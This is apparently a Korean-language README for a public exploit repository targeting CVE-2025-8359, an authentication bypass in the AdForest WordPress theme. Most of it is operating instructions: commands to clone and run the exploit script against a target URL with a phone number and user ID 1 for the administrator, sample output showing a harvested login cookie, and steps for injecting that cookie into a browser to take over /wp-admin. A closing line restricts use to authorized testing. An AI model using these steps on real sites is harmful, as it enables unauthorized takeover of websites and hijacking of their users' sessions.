
AdForest <= 6.0.9 - 인증 우회로 관리자 권한 획득
AdForest <= 6.0.9 - 관리자 인증 우회
저장소: Nxploited/CVE-2025-8359
익스플로잇 스크립트:CVE-2025-8359.py
CVE: CVE-2025-8359
취약점 유형: 인증 우회
영향받는 제품: AdForest - Classified Ads WordPress Theme
영향받는 버전: 6.0.9 이하
CVSS 점수: 9.8 (Critical)
WordPress용 AdForest 테마는 6.0.9 이하의 모든 버전에서 인증 우회 결함에 취약합니다.
인증 중 사용자 신원 검증이 부적절하여, 인증되지 않은 공격자는 비밀번호 없이 관리자를 포함한 모든 사용자로 로그인할 수 있습니다. 이로 인해 AdForest를 사용하는 WordPress 사이트가 완전히 장악될 수 있습니다.
이 저장소에는 전문적인 Python 익스플로잇 스크립트인 CVE-2025-8359.py가 포함되어 있습니다.
이 스크립트는 공격을 자동화하고, 성공 확률을 극대화하기 위해 가능한 모든 전화번호 형식을 지능적으로 테스트합니다.
관리자를 포함한 모든 사용자로 인증할 수 있으며, 세션 탈취를 위한 유효한 WordPress 로그인 쿠키를 복구할 수 있습니다.
주요 기능:
+, 공백, 인코딩 등).저장소를 클론합니다:
git clone https://github.com/Nxploited/CVE-2025-8359.git
cd CVE-2025-8359
의존성을 설치합니다:
pip install requests
익스플로잇 스크립트를 실행합니다:
python CVE-2025-8359.py -u "http://target.com/wordpress" -p "+966 555 555 555" -i 1
-u : WordPress 설치 기본 URL.-p : 대상 사용자의 전화번호(DB에 저장된 값).-i : 대상 사용자 ID(예: 관리자는 1).-n : 이름 값(선택 사항, 기본값 "test").스크립트 도움말을 확인합니다:
python CVE-2025-8359.py -h
requestspip install requests공격에 성공한 경우:
[+] Logged in! Cookie: wordpress_logged_in_xxxxxx=xxxxxxx
대상 사용자에 대한 유효한 WordPress 인증 쿠키가 생성됩니다.
모든 형식이 실패한 경우:
[-] All variants failed. Try other phone formats or check the database.
공격에 성공하면 스크립트가 복구된 인증 쿠키를 출력합니다.
쿠키 사용 방법:
wordpress_logged_in_... 값을 복사합니다./wp-admin/에 접속합니다. 공격이 성공했다면 관리자 접근 권한을 얻게 됩니다.예시(Chrome 확장 프로그램 사용):
wordpress_logged_in_xxxxxxxxxxxxx(스크립트가 출력한 값)이 프로젝트와 익스플로잇은 교육 및 승인된 침투 테스트 목적으로만 사용됩니다.
저자는 이 익스플로잇의 오용이나 피해에 대해 책임지지 않습니다.
항상 시스템을 테스트하기 전에 적절한 허가를 받으십시오.